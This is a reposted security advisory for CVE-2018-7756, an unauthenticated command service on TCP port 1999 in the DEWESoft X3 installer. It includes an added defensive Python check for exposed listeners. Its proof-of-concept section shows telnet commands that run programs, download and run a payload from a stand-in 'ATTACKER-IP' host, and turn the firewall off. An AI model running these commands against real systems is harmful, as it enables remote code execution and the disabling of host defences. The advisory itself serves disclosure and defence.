zdt | Hyp3rlinx | 1337DAY-ID-29981
Mar 12, 2018 - 12:00 a.m.

DEWESoft X3 SP1 (64-bit) installer / Remote Internal Command Access Vulnerability

2018-03-12 00:00:00
hyp3rlinx
0day.today

EPSS: 0.8 High
Percentile: 98.3%

Exploit for windows platform in category remote exploits

[+] Credits: John Page (aka hyp3rlinx)

Vendor:
=============
www.dewesoft.com


Product:
===========
DEWESoft X3 SP1 (64-bit) installer - X3
DEWESoft_FULL_X3_SP1_64BIT.exe



Vulnerability Type:
===================
Remote Internal Command Access



CVE Reference:
==============
CVE-2018-7756



Security Issue:
================
The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component, does not require authentication
for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a
RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or run
a "SETFIREWALL Off" command.

The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full-install.

Internal commands used by "RunExeFile.exe", for which I could not find any documentation:

RUN <ANY EXE>
RUNEX <ANY EXE>
GETFIREWALL
SETFIREWALL Off
KILL <PROCESS>
USERNAME
SHUTDOWN
SENDKEYS
LIST
DWPIPE
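
A defender-side check for the exposure described above, added here as an example and not part of the original advisory: it flags non-loopback listeners on TCP port 1999 in `netstat -ano` output and allowed inbound connections to that port in a Windows Firewall log. The sample data is constructed, the function names are hypothetical, and the log lines assume the default 17-field pfirewall.log layout.

```python
import ipaddress

PORT = 1999  # TCP port the advisory says RunExeFile.exe serves without authentication

# Constructed `netstat -ano` output (sample data, not from the advisory).
NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:1999           0.0.0.0:0              LISTENING       4312
  TCP    127.0.0.1:5354         0.0.0.0:0              LISTENING       2210
  TCP    192.168.10.20:1999     192.168.10.77:50514    ESTABLISHED     4312
  TCP    [::]:1999              [::]:0                 LISTENING       4312
"""

# Constructed Windows Firewall log lines (assumed default pfirewall.log field order).
FWLOG = """\
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2018-03-12 10:01:02 ALLOW TCP 192.168.10.77 192.168.10.20 50514 1999 0 - 0 0 0 - - - RECEIVE
2018-03-12 10:01:09 ALLOW TCP 192.168.10.20 192.168.10.5 50520 445 0 - 0 0 0 - - - SEND
2018-03-12 10:02:30 DROP TCP 203.0.113.9 192.168.10.20 41000 1999 0 - 0 0 0 - - - RECEIVE
2018-03-12 10:03:00 ALLOW TCP 192.168.10.5 192.168.10.20 50999 1999 0 - 0 0 0 - - - RECEIVE
"""

def split_endpoint(ep):
    """Split 'host:port' or '[v6]:port' into (host, port)."""
    host, _, port = ep.rpartition(":")
    return host.strip("[]"), int(port)

def exposed_listeners(netstat_text, port=PORT):
    """Return (address, pid) for listeners on `port` that are not bound to loopback."""
    hits = []
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) == 5 and f[0] == "TCP" and f[3] == "LISTENING":
            host, p = split_endpoint(f[1])
            if p == port and not ipaddress.ip_address(host).is_loopback:
                hits.append((host, int(f[4])))
    return hits

def inbound_sessions(fw_text, allowed=(), port=PORT):
    """Return (timestamp, src_ip) for allowed inbound TCP to `port` from unapproved sources."""
    hits = []
    for line in fw_text.splitlines():
        f = line.split()
        if line.startswith("#") or len(f) < 17:
            continue
        date, time, action, proto, src, _dst, _sport, dport = f[:8]
        if (action, proto, f[16]) == ("ALLOW", "TCP", "RECEIVE") and int(dport) == port and src not in allowed:
            hits.append((f"{date} {time}", src))
    return hits
```

Map any PID returned by `exposed_listeners` to its image name (for example with `tasklist`) to confirm whether the listener is RunExeFile.exe before blocking the port or removing the component.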

Exploit/POC:
=============
TELNET x.x.x.x 1999 
RUN calc.exe

OR

Launch the victim's browser and send them to a website for a drive-by download, etc.

TELNET x.x.x.x 1999 
RUN http://ATTACKER-IP/DOOM.exe

Then from the TELNET session execute it from Downloads directory.

runexe c:\Users\victim\Downloads\DOOM.exe

#  0day.today [2018-04-02]  #
